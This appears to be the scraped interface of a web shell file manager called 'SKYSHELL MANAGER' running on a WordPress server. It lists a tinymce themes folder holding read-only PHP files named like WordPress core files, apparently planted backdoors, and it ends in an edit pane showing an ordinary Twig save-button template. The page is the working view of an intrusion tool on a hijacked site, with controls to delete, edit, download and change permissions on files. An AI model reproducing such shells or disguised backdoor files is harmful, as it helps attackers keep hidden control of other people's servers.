📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: save.html.twig
{% macro component(config, localized) %} {% import "system/macro/anchor-button.html.twig" as anchor_button %} <div> {% embed "system/embed/form-row.html.twig" %} {% block label %} {% endblock %} {% block input %} {% import "system/macro/anchor-button.html.twig" as anchor_button %} {% import "system/macro/form-component/button.html.twig" as button %} {# Merge overwrite default config with given config. #} {% set config = {action:'save'} | merge(config) %} {% if config.nonce is not empty %} {{ config.nonce | raw }} {% endif %} {% if config.value is not empty %} <input type="hidden" name="id" value="{{ config.value }}"> {% endif %} <div> {% if config.backLink is not empty %} {{ anchor_button.component({ backgroundColor:'bc-bg-gray-600', backgroundColorHover:'hover:bc-bg-gray-700', href: config.backLink, linkText: config.backButton ? config.backButton : localized.global.button.goBackWithoutSaving, margin: 'bc-mr-2' }) }} {% endif %} {{ button.component({ id: config.buttonId, isDisabled: config.isDisabled, name: 'action', value: config.action, button: config.button ? config.button : localized.global.button.saveAllSettings }) }} </div> {% endblock %} {% endembed %} </div> {% endmacro %}
Save